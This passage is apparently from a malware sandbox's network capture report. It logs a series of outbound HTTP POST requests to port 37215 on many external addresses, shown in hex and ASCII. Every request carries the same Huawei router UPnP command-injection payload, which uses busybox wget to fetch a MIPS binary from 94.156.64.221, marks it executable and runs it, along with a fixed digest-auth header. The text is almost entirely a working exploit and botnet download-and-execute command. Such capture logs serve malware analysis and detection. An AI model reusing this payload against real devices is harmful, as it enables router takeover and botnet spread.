33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    311192.168.2.235185041.201.77.12237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.257093906 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    312192.168.2.233925041.136.53.18737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.273649931 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    313192.168.2.2337362156.48.71.4037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.273710966 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    314192.168.2.234749041.197.206.17437215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.273749113 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    315192.168.2.2346148197.69.9.8237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.273782015 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    316192.168.2.2340358156.251.190.17637215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.273833036 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    317192.168.2.2360218156.211.151.2137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.273878098 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    318192.168.2.2335310156.55.54.2737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.273911953 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    319192.168.2.234746241.90.29.9037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.273947954 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    320192.168.2.2348062156.238.73.15937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.273986101 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    321192.168.2.2352602156.150.168.2237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.274024010 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
